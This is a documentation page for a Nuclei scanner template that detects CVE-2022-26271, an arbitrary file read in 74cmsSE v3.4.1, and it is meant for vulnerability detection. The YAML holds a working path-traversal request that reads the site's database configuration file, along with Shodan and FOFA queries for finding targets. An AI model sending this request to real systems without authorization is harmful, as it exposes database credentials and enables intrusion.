Skip to content
Nuclei Templates

74cmsSE v3.4.1 - Arbitrary File Read

ID: CVE-2022-26271

Severity: high

Author: ritikchaddha

Tags: cve,cve2022,74cms,lfr

Description

Section titled “Description”

74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \index\controller\Download.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-26271


info:
  name: 74cmsSE v3.4.1 - Arbitrary File Read
  author: ritikchaddha
  severity: high
  description: |
    74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \index\controller\Download.php.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1
    - https://nvd.nist.gov/vuln/detail/cve-2022-26271
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26271
    cwe-id: CWE-552
    epss-score: 0.00205
    epss-percentile: 0.58092
    cpe: cpe:2.3:a:74cms:74cms:3.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: 74cms
    product: 74cms
    shodan-query: http.html:"74cms"
    fofa-query: app="74cms"
  tags: cve,cve2022,74cms,lfr


http:
  - method: GET
    path:
      - "{{BaseURL}}/index/download/index?name=index.php&url=../../application/database.php"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "return array"
          - "password"
          - "database"
        condition: and


      - type: word
        part: content_type
        words:
          - "application/octet-stream"
# digest: 490a0046304402205d26e777c08bd1983863be60f96200f0995688d1bdc7c2738e5174cfeff3f5c3022076467782e3cf4ee767745bb72603ffd4138292f951b6019e2c8b1b41d14c1129:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-26271.yaml"

View on Github